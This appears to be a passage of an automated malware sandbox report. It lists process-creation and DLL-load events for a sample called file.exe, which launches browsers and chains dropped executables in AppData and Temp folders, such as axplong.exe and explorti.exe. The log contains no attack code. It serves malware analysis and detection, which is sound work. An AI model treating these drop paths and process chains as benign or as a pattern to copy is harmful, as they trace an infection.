                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4208 --field-trial-handle=2016,i,17827590542136371952,471610067636896482,262144 /prefetch:8Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2184,i,4203635227704693361,2033266922296475971,262144 /prefetch:3Jump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2184,i,4203635227704693361,2033266922296475971,262144 /prefetch:3Jump to behavior
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20230927232528 -prefsHandle 2196 -prefMapHandle 2188 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0cf79a7-9fe5-4dbc-be74-a5022d30a8d8} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e94a56a710 socket
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4440 -parentBuildID 20230927232528 -prefsHandle 4424 -prefMapHandle 4420 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9504f799-890a-40e2-aa3f-a414be824c0e} 7200 "\\.\pipe\gecko-crash-server-pipe.7200" 1e95cb89510 rdd
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\RoamingCBGCBGCAFI.exe "C:\Users\user\AppData\RoamingCBGCBGCAFI.exe"
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:3
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6788 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6976 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3536 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=4844 --field-trial-handle=2052,i,1752942854585544947,948443315218299471,262144 /prefetch:8
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe "C:\Users\user\AppData\Local\Temp\1000021001\4ddf12fb51.exe"
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\userGDHIIIIEHC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\userCFHCBKKFIJ.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: mstask.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: dui70.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: duser.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: chartv.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: oleacc.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: atlthunk.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: textinputframework.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: coreuicomponents.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: coremessaging.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: wtsapi32.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: winsta.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: textshaping.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: explorerframe.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: windows.fileexplorer.common.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dll
